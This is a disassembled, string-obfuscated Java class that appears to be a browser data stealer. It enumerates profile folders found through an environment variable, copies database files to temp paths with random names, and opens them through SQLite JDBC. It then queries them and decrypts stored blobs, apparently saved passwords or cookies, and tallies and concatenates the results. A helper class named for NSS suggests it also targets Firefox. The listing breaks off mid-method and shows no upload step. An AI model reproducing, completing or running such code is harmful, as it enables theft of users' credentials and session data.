Compiled from "c.java"
public class a.b.d.c {
  private static final java.lang.String w;

  private static int c;

  private static int f;

  private static int U;

  private static int I;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] d;

  private static final java.lang.Long[] e;

  public a.b.d.c();
    Code:
         0: aload_0
         1: invokespecial #208                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #374                // long 95112861306019l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #366                // long 134345912772333l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #211                // Field c:I
        16: iconst_0
        17: putstatic     #150                // Field f:I
        20: iconst_0
        21: putstatic     #65                 // Field U:I
        24: iconst_0
        25: putstatic     #296                // Field I:I
        28: ldc           #7                  // int -810536880
        30: sipush        -2093
        33: isub
        34: ldc           #7                  // int -810536880
        36: sipush        -2765
        39: isub
        40: lload_0
        41: l2i
        42: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        45: invokestatic  #233                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        48: ldc           #7                  // int -810536880
        50: sipush        -2056
        53: isub
        54: ldc           #6                  // int 810536880
        56: sipush        1570
        59: iadd
        60: lload_0
        61: l2i
        62: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        65: invokestatic  #318                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        68: ldc           #7                  // int -810536880
        70: sipush        -2081
        73: isub
        74: ldc           #6                  // int 810536880
        76: sipush        8400
        79: isub
        80: lload_0
        81: l2i
        82: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        85: invokedynamic #255,  0            // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
        90: astore        4
        92: aload         4
        94: ldc           #7                  // int -810536880
        96: sipush        -2050
        99: isub
       100: ldc           #6                  // int 810536880
       102: sipush        393
       105: iadd
       106: lload_0
       107: l2i
       108: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       111: invokestatic  #293                // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
       114: lload_2
       115: aload         4
       117: iconst_2
       118: anewarray     #273                // class java/lang/Object
       121: dup_x1
       122: swap
       123: iconst_1
       124: swap
       125: aastore
       126: dup_x2
       127: dup_x2
       128: pop
       129: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       132: iconst_0
       133: swap
       134: aastore
       135: invokestatic  #107                // Method i:([Ljava/lang/Object;)V
       138: ldc           #7                  // int -810536880
       140: sipush        -2051
       143: isub
       144: ldc           #6                  // int 810536880
       146: sipush        18598
       149: isub
       150: lload_0
       151: l2i
       152: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       155: ldc           #7                  // int -810536880
       157: sipush        -2042
       160: isub
       161: ldc           #6                  // int 810536880
       163: sipush        6907
       166: isub
       167: lload_0
       168: l2i
       169: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       172: getstatic     #211                // Field c:I
       175: invokestatic  #158                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       178: ldc           #7                  // int -810536880
       180: sipush        -2045
       183: isub
       184: ldc           #7                  // int -810536880
       186: sipush        -12781
       189: isub
       190: lload_0
       191: l2i
       192: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       195: ldc           #7                  // int -810536880
       197: sipush        -2064
       200: isub
       201: ldc           #6                  // int 810536880
       203: sipush        834
       206: iadd
       207: lload_0
       208: l2i
       209: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       212: getstatic     #150                // Field f:I
       215: invokestatic  #158                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       218: ldc           #7                  // int -810536880
       220: sipush        -2045
       223: isub
       224: ldc           #7                  // int -810536880
       226: sipush        -12781
       229: isub
       230: lload_0
       231: l2i
       232: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       235: ldc           #7                  // int -810536880
       237: sipush        -2048
       240: isub
       241: ldc           #6                  // int 810536880
       243: sipush        17055
       246: isub
       247: lload_0
       248: l2i
       249: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       252: getstatic     #65                 // Field U:I
       255: invokestatic  #158                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       258: ldc           #7                  // int -810536880
       260: sipush        -2045
       263: isub
       264: ldc           #7                  // int -810536880
       266: sipush        -12781
       269: isub
       270: lload_0
       271: l2i
       272: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       275: ldc           #7                  // int -810536880
       277: sipush        -2059
       280: isub
       281: ldc           #6                  // int 810536880
       283: sipush        4976
       286: isub
       287: lload_0
       288: l2i
       289: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       292: getstatic     #296                // Field I:I
       295: invokestatic  #158                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       298: return

  private static void i(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #336                // class java/lang/Long
         7: invokevirtual #114                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #157                // class java/lang/String
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #368                // long 3561659090096l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #317                // Field a/b/d/dec$NssSec.m:Z
        31: new           #320                // class java/io/File
        34: dup
        35: aload_3
        36: invokespecial #58                 // Method java/io/File."<init>":(Ljava/lang/String;)V
        39: astore        7
        41: istore        6
        43: aload         7
        45: iload         6
        47: ifne          64
        50: invokevirtual #52                 // Method java/io/File.exists:()Z
        53: ifne          62
        56: goto          60
        59: athrow
        60: return
        61: athrow
        62: aload         7
        64: invokevirtual #227                // Method java/io/File.listFiles:()[Ljava/io/File;
        67: astore        8
        69: aload         8
        71: iload         6
        73: ifne          86
        76: ifnonnull     84
        79: goto          83
        82: athrow
        83: return
        84: aload         8
        86: astore        9
        88: aload         9
        90: arraylength
        91: istore        10
        93: iconst_0
        94: istore        11
        96: iload         11
        98: iload         10
       100: if_icmpge     285
       103: aload         9
       105: iload         11
       107: aaload
       108: astore        12
       110: iload         6
       112: lload_1
       113: lconst_0
       114: lcmp
       115: ifle          282
       118: ifne          280
       121: aload         12
       123: invokevirtual #268                // Method java/io/File.isDirectory:()Z
       126: ifeq          277
       129: goto          133
       132: athrow
       133: aload         12
       135: iload         6
       137: ifne          233
       140: goto          144
       143: athrow
       144: lload_1
       145: lconst_0
       146: lcmp
       147: iflt          229
       150: invokevirtual #183                // Method java/io/File.getName:()Ljava/lang/String;
       153: ldc           #2                  // int 400025640
       155: sipush        30332
       158: iadd
       159: ldc           #2                  // int 400025640
       161: sipush        16715
       164: iadd
       165: lload_1
       166: l2i
       167: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       170: invokevirtual #239                // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       173: ifne          227
       176: goto          180
       179: athrow
       180: lload_1
       181: lconst_0
       182: lcmp
       183: iflt          272
       186: aload         12
       188: iload         6
       190: ifne          233
       193: goto          197
       196: athrow
       197: invokevirtual #183                // Method java/io/File.getName:()Ljava/lang/String;
       200: ldc           #2                  // int 400025640
       202: sipush        30338
       205: iadd
       206: ldc           #18                 // int -400025640
       208: sipush        -22487
       211: iadd
       212: lload_1
       213: l2i
       214: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       217: invokevirtual #131                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       220: ifeq          277
       223: goto          227
       226: athrow
       227: aload         12
       229: goto          233
       232: athrow
       233: lload         4
       235: dup2_x1
       236: pop2
       237: iconst_2
       238: anewarray     #273                // class java/lang/Object
       241: dup_x1
       242: swap
       243: iconst_1
       244: swap
       245: aastore
       246: dup_x2
       247: dup_x2
       248: pop
       249: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       252: iconst_0
       253: swap
       254: aastore
       255: invokestatic  #29                 // Method Z:([Ljava/lang/Object;)V
       258: sipush        3113
       261: ldc2_w        #380                // long 1934942128549381035l
       264: lload_1
       265: lxor
       266: invokestatic  #321                // Method a:(IJ)J
       269: invokestatic  #285                // Method java/lang/Thread.sleep:(J)V
       272: goto          277
       275: astore        13
       277: iinc          11, 1
       280: iload         6
       282: ifeq          96
       285: return
      Exception table:
         from    to  target type
           197   229   232   Class java/lang/Exception
           180   223   226   Class java/lang/Exception
           144   193   196   Class java/lang/Exception
           133   176   179   Class java/lang/Exception
           121   140   143   Class java/lang/Exception
           110   129   132   Class java/lang/Exception
            69    79    82   Class java/lang/Exception
            50    61    61   Class java/lang/Exception
            43    56    59   Class java/lang/Exception
           258   272   275   Class java/lang/Exception

  private static void Z(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #336                // class java/lang/Long
         7: invokevirtual #114                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #320                // class java/io/File
        17: astore_3
        18: pop
        19: lload_1
        20: dup2
        21: ldc2_w        #378                // long 2054826704347l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #317                // Field a/b/d/dec$NssSec.m:Z
        31: aload_3
        32: invokevirtual #183                // Method java/io/File.getName:()Ljava/lang/String;
        35: astore        7
        37: istore        6
        39: new           #320                // class java/io/File
        42: dup
        43: aload_3
        44: ldc           #14                 // int 1421060940
        46: sipush        -4407
        49: i2c
        50: iadd
        51: ldc           #14                 // int 1421060940
        53: sipush        -5916
        56: i2c
        57: iadd
        58: lload_1
        59: l2i
        60: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
        63: invokespecial #42                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        66: iload         6
        68: ifne          623
        71: invokevirtual #52                 // Method java/io/File.exists:()Z
        74: ifne          161
        77: new           #320                // class java/io/File
        80: dup
        81: aload_3
        82: ldc           #14                 // int 1421060940
        84: sipush        -4385
        87: i2c
        88: iadd
        89: ldc           #8                  // int -1421060940
        91: sipush        -10663
        94: i2c
        95: ineg
        96: iadd
        97: lload_1
        98: l2i
        99: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       102: invokespecial #42                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       105: iload         6
       107: ifne          623
       110: invokevirtual #52                 // Method java/io/File.exists:()Z
       113: ifne          161
       116: new           #320                // class java/io/File
       119: dup
       120: aload_3
       121: ldc           #14                 // int 1421060940
       123: sipush        -4417
       126: i2c
       127: iadd
       128: ldc           #19                 // int 1421192010
       130: sipush        -11844
       133: i2c
       134: isub
       135: lload_1
       136: l2i
       137: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       140: invokespecial #42                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       143: iload         6
       145: lload_1
       146: lconst_0
       147: lcmp
       148: ifle          630
       151: ifne          623
       154: invokevirtual #52                 // Method java/io/File.exists:()Z
       157: ifne          161
       160: return
       161: aload_3
       162: ldc           #14                 // int 1421060940
       164: sipush        -4416
       167: i2c
       168: iadd
       169: ldc           #19                 // int 1421192010
       171: sipush        -12758
       174: i2c
       175: isub
       176: lload_1
       177: l2i
       178: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       181: ldc           #14                 // int 1421060940
       183: sipush        -4404
       186: i2c
       187: iadd
       188: ldc           #19                 // int 1421192010
       190: sipush        -14782
       193: i2c
       194: isub
       195: lload_1
       196: l2i
       197: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       200: aload         7
       202: lload         4
       204: ldc           #14                 // int 1421060940
       206: sipush        -4366
       209: i2c
       210: iadd
       211: ldc           #19                 // int 1421192010
       213: bipush        -10
       215: i2c
       216: isub
       217: lload_1
       218: l2i
       219: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       222: iconst_1
       223: bipush        7
       225: anewarray     #273                // class java/lang/Object
       228: dup_x1
       229: swap
       230: invokestatic  #214                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       233: bipush        6
       235: swap
       236: aastore
       237: dup_x1
       238: swap
       239: iconst_5
       240: swap
       241: aastore
       242: dup_x2
       243: dup_x2
       244: pop
       245: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       248: iconst_4
       249: swap
       250: aastore
       251: dup_x1
       252: swap
       253: iconst_3
       254: swap
       255: aastore
       256: dup_x1
       257: swap
       258: iconst_2
       259: swap
       260: aastore
       261: dup_x1
       262: swap
       263: iconst_1
       264: swap
       265: aastore
       266: dup_x1
       267: swap
       268: iconst_0
       269: swap
       270: aastore
       271: invokestatic  #138                // Method p:([Ljava/lang/Object;)V
       274: aload_3
       275: ldc           #14                 // int 1421060940
       277: sipush        -4369
       280: i2c
       281: iadd
       282: ldc           #8                  // int -1421060940
       284: sipush        -6435
       287: i2c
       288: ineg
       289: iadd
       290: lload_1
       291: l2i
       292: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       295: ldc           #14                 // int 1421060940
       297: sipush        -4397
       300: i2c
       301: iadd
       302: ldc           #10                 // int -1421192010
       304: sipush        -1069
       307: i2c
       308: ineg
       309: isub
       310: lload_1
       311: l2i
       312: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       315: aload         7
       317: lload         4
       319: ldc           #14                 // int 1421060940
       321: sipush        -4406
       324: i2c
       325: iadd
       326: ldc           #19                 // int 1421192010
       328: sipush        -10093
       331: i2c
       332: isub
       333: lload_1
       334: l2i
       335: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       338: iconst_2
       339: bipush        7
       341: anewarray     #273                // class java/lang/Object
       344: dup_x1
       345: swap
       346: invokestatic  #214                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       349: bipush        6
       351: swap
       352: aastore
       353: dup_x1
       354: swap
       355: iconst_5
       356: swap
       357: aastore
       358: dup_x2
       359: dup_x2
       360: pop
       361: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       364: iconst_4
       365: swap
       366: aastore
       367: dup_x1
       368: swap
       369: iconst_3
       370: swap
       371: aastore
       372: dup_x1
       373: swap
       374: iconst_2
       375: swap
       376: aastore
       377: dup_x1
       378: swap
       379: iconst_1
       380: swap
       381: aastore
       382: dup_x1
       383: swap
       384: iconst_0
       385: swap
       386: aastore
       387: invokestatic  #138                // Method p:([Ljava/lang/Object;)V
       390: aload_3
       391: ldc           #14                 // int 1421060940
       393: sipush        -4379
       396: i2c
       397: iadd
       398: ldc           #19                 // int 1421192010
       400: sipush        -8536
       403: i2c
       404: isub
       405: lload_1
       406: l2i
       407: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       410: ldc           #14                 // int 1421060940
       412: sipush        -4426
       415: i2c
       416: iadd
       417: ldc           #19                 // int 1421192010
       419: sipush        -665
       422: i2c
       423: isub
       424: lload_1
       425: l2i
       426: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       429: aload         7
       431: lload         4
       433: ldc           #14                 // int 1421060940
       435: sipush        -4394
       438: i2c
       439: iadd
       440: ldc           #10                 // int -1421192010
       442: sipush        -6653
       445: i2c
       446: ineg
       447: isub
       448: lload_1
       449: l2i
       450: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       453: iconst_3
       454: bipush        7
       456: anewarray     #273                // class java/lang/Object
       459: dup_x1
       460: swap
       461: invokestatic  #214                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       464: bipush        6
       466: swap
       467: aastore
       468: dup_x1
       469: swap
       470: iconst_5
       471: swap
       472: aastore
       473: dup_x2
       474: dup_x2
       475: pop
       476: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       479: iconst_4
       480: swap
       481: aastore
       482: dup_x1
       483: swap
       484: iconst_3
       485: swap
       486: aastore
       487: dup_x1
       488: swap
       489: iconst_2
       490: swap
       491: aastore
       492: dup_x1
       493: swap
       494: iconst_1
       495: swap
       496: aastore
       497: dup_x1
       498: swap
       499: iconst_0
       500: swap
       501: aastore
       502: invokestatic  #138                // Method p:([Ljava/lang/Object;)V
       505: aload_3
       506: ldc           #14                 // int 1421060940
       508: sipush        -4403
       511: i2c
       512: iadd
       513: ldc           #10                 // int -1421192010
       515: sipush        -3690
       518: i2c
       519: ineg
       520: isub
       521: lload_1
       522: l2i
       523: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       526: ldc           #14                 // int 1421060940
       528: sipush        -4427
       531: i2c
       532: iadd
       533: ldc           #10                 // int -1421192010
       535: sipush        -15979
       538: i2c
       539: ineg
       540: isub
       541: lload_1
       542: l2i
       543: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       546: aload         7
       548: lload         4
       550: ldc           #14                 // int 1421060940
       552: sipush        -4382
       555: i2c
       556: iadd
       557: ldc           #8                  // int -1421060940
       559: sipush        -925
       562: i2c
       563: ineg
       564: iadd
       565: lload_1
       566: l2i
       567: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       570: iconst_5
       571: bipush        7
       573: anewarray     #273                // class java/lang/Object
       576: dup_x1
       577: swap
       578: invokestatic  #214                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       581: bipush        6
       583: swap
       584: aastore
       585: dup_x1
       586: swap
       587: iconst_5
       588: swap
       589: aastore
       590: dup_x2
       591: dup_x2
       592: pop
       593: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       596: iconst_4
       597: swap
       598: aastore
       599: dup_x1
       600: swap
       601: iconst_3
       602: swap
       603: aastore
       604: dup_x1
       605: swap
       606: iconst_2
       607: swap
       608: aastore
       609: dup_x1
       610: swap
       611: iconst_1
       612: swap
       613: aastore
       614: dup_x1
       615: swap
       616: iconst_0
       617: swap
       618: aastore
       619: invokestatic  #138                // Method p:([Ljava/lang/Object;)V
       622: aload_3
       623: ldc           #14                 // int 1421060940
       625: sipush        -4424
       628: i2c
       629: iadd
       630: ldc           #19                 // int 1421192010
       632: sipush        -14700
       635: i2c
       636: isub
       637: lload_1
       638: l2i
       639: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       642: ldc           #14                 // int 1421060940
       644: sipush        -4370
       647: i2c
       648: iadd
       649: ldc           #8                  // int -1421060940
       651: sipush        -3536
       654: i2c
       655: ineg
       656: iadd
       657: lload_1
       658: l2i
       659: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       662: aload         7
       664: lload         4
       666: ldc           #14                 // int 1421060940
       668: sipush        -4372
       671: i2c
       672: iadd
       673: ldc           #10                 // int -1421192010
       675: sipush        -15839
       678: i2c
       679: ineg
       680: isub
       681: lload_1
       682: l2i
       683: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       686: iconst_4
       687: bipush        7
       689: anewarray     #273                // class java/lang/Object
       692: dup_x1
       693: swap
       694: invokestatic  #214                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       697: bipush        6
       699: swap
       700: aastore
       701: dup_x1
       702: swap
       703: iconst_5
       704: swap
       705: aastore
       706: dup_x2
       707: dup_x2
       708: pop
       709: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       712: iconst_4
       713: swap
       714: aastore
       715: dup_x1
       716: swap
       717: iconst_3
       718: swap
       719: aastore
       720: dup_x1
       721: swap
       722: iconst_2
       723: swap
       724: aastore
       725: dup_x1
       726: swap
       727: iconst_1
       728: swap
       729: aastore
       730: dup_x1
       731: swap
       732: iconst_0
       733: swap
       734: aastore
       735: invokestatic  #138                // Method p:([Ljava/lang/Object;)V
       738: return

  private static void p(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #320                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #157                // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #157                // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #157                // class java/lang/String
        28: astore        4
        30: dup
        31: iconst_4
        32: aaload
        33: checkcast     #336                // class java/lang/Long
        36: invokevirtual #114                // Method java/lang/Long.longValue:()J
        39: lstore        5
        41: dup
        42: iconst_5
        43: aaload
        44: checkcast     #157                // class java/lang/String
        47: astore        7
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #93                 // class java/lang/Integer
        56: invokevirtual #230                // Method java/lang/Integer.intValue:()I
        59: istore        8
        61: pop
        62: getstatic     #317                // Field a/b/d/dec$NssSec.m:Z
        65: new           #320                // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #42                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: invokevirtual #52                 // Method java/io/File.exists:()Z
        83: iload         9
        85: ifne          156
        88: ifne          142
        91: goto          95
        94: athrow
        95: iload         8
        97: iload         9
        99: ifne          156
       102: goto          106
       105: athrow
       106: iconst_2
       107: if_icmpne     142
       110: goto          114
       113: athrow
       114: new           #320                // class java/io/File
       117: dup
       118: aload_1
       119: ldc           #20                 // int 964937340
       121: sipush        7818
       124: isub
       125: ldc           #4                  // int -964937340
       127: sipush        -4747
       130: isub
       131: lload         5
       133: l2i
       134: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       137: invokespecial #42                 // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       140: astore        10
       142: aload         10
       144: iload         9
       146: ifne          194
       149: invokevirtual #52                 // Method java/io/File.exists:()Z
       152: goto          156
       155: athrow
       156: ifne          160
       159: return
       160: new           #320                // class java/io/File
       163: dup
       164: ldc           #20                 // int 964937340
       166: sipush        7849
       169: isub
       170: ldc           #20                 // int 964937340
       172: sipush        160
       175: iadd
       176: lload         5
       178: l2i
       179: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       182: invokestatic  #43                 // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       185: invokestatic  #133                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       188: invokevirtual #191                // Method java/util/UUID.toString:()Ljava/lang/String;
       191: invokespecial #94                 // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       194: astore        11
       196: aload         10
       198: iload         9
       200: ifne          245
       203: aload         11
       205: ldc           #20                 // int 964937340
       207: sipush        7810
       210: isub
       211: ldc           #20                 // int 964937340
       213: sipush        1182
       216: iadd
       217: lload         5
       219: l2i
       220: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       223: invokestatic  #225                // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       226: lload         5
       228: lconst_0
       229: lcmp
       230: ifle          241
       233: ifne          243
       236: aload         11
       238: invokevirtual #228                // Method java/io/File.delete:()Z
       241: pop
       242: return
       243: aload         11
       245: invokevirtual #98                 // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       248: ldc           #20                 // int 964937340
       250: sipush        7861
       253: isub
       254: ldc           #20                 // int 964937340
       256: sipush        6614
       259: iadd
       260: lload         5
       262: l2i
       263: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       266: swap
       267: invokedynamic #362,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       272: invokestatic  #299                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       275: astore        12
       277: aload         12
       279: invokeinterface #306,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       284: astore        13
       286: aload         13
       288: aload_3
       289: invokeinterface #54,  2           // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       294: astore        14
       296: new           #193                // class java/lang/StringBuilder
       299: dup
       300: invokespecial #132                // Method java/lang/StringBuilder."<init>":()V
       303: astore        15
       305: iload         8
       307: iconst_5
       308: iload         9
       310: ifne          850
       313: if_icmpne     834
       316: goto          320
       319: athrow
       320: new           #219                // class java/util/HashMap
       323: dup
       324: invokespecial #333                // Method java/util/HashMap."<init>":()V
       327: astore        16
       329: aload         12
       331: invokeinterface #306,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       336: ldc           #20                 // int 964937340
       338: sipush        7817
       341: isub
       342: ldc           #20                 // int 964937340
       344: sipush        7086
       347: isub
       348: lload         5
       350: l2i
       351: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       354: invokeinterface #54,  2           // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       359: astore        17
       361: aload         17
       363: invokeinterface #140,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       368: ifeq          441
       371: aload         17
       373: iconst_2
       374: invokeinterface #148,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       379: invokestatic  #359                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       382: astore        18
       384: aload         18
       386: iload         9
       388: lload         5
       390: lconst_0
       391: lcmp
       392: ifle          400
       395: ifne          1822
       398: iload         9
       400: ifne          435
       403: goto          407
       406: athrow
       407: ifnull        436
       410: goto          414
       413: athrow
       414: aload         16
       416: aload         17
       418: iconst_1
       419: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       424: aload         18
       426: invokeinterface #252,  3          // InterfaceMethod java/util/Map.put:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
       431: goto          435
       434: athrow
       435: pop
       436: iload         9
       438: ifeq          361
       441: lload         5
       443: lconst_0
       444: lcmp
       445: iflt          476
       448: aload         17
       450: iload         9
       452: lload         5
       454: lconst_0
       455: lcmp
       456: iflt          374
       459: ifne          471
       462: ifnull        524
       465: goto          469
       468: athrow
       469: aload         17
       471: invokeinterface #122,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       476: goto          524
       479: astore        18
       481: lload         5
       483: lconst_0
       484: lcmp
       485: iflt          509
       488: aload         17
       490: iload         9
       492: ifne          504
       495: ifnull        521
       498: goto          502
       501: athrow
       502: aload         17
       504: invokeinterface #122,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       509: goto          521
       512: astore        19
       514: aload         18
       516: aload         19
       518: invokevirtual #358                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       521: aload         18
       523: athrow
       524: goto          529
       527: astore        17
       529: aload         14
       531: invokeinterface #140,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       536: ifeq          815
       539: aload         14
       541: iconst_5
       542: invokeinterface #148,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       547: invokestatic  #359                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       550: astore        17
       552: iload         9
       554: lload         5
       556: lconst_0
       557: lcmp
       558: ifle          734
       561: ifne          712
       564: aload         17
       566: iload         9
       568: ifne          1822
       571: goto          575
       574: athrow
       575: ifnull        810
       578: goto          582
       581: athrow
       582: getstatic     #296                // Field I:I
       585: iconst_1
       586: iadd
       587: putstatic     #296                // Field I:I
       590: aload         15
       592: ldc           #20                 // int 964937340
       594: sipush        7812
       597: isub
       598: ldc           #4                  // int -964937340
       600: sipush        -10482
       603: isub
       604: lload         5
       606: l2i
       607: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       610: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       613: aload         14
       615: iconst_2
       616: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       621: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       624: ldc           #20                 // int 964937340
       626: sipush        7840
       629: isub
       630: ldc           #4                  // int -964937340
       632: sipush        -9711
       635: isub
       636: lload         5
       638: l2i
       639: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       642: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       645: aload         17
       647: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       650: ldc           #20                 // int 964937340
       652: sipush        7844
       655: isub
       656: ldc           #4                  // int -964937340
       658: sipush        -3087
       661: iadd
       662: lload         5
       664: l2i
       665: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       668: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       671: aload         14
       673: iconst_3
       674: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       679: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       682: ldc           #11                 // String /
       684: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       687: aload         14
       689: iconst_4
       690: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       695: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       698: iload         9
       700: ifne          809
       703: goto          707
       706: athrow
       707: pop
       708: goto          712
       711: athrow
       712: lload         5
       714: lconst_0
       715: lcmp
       716: ifle          782
       719: aload         16
       721: aload         14
       723: iconst_1
       724: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
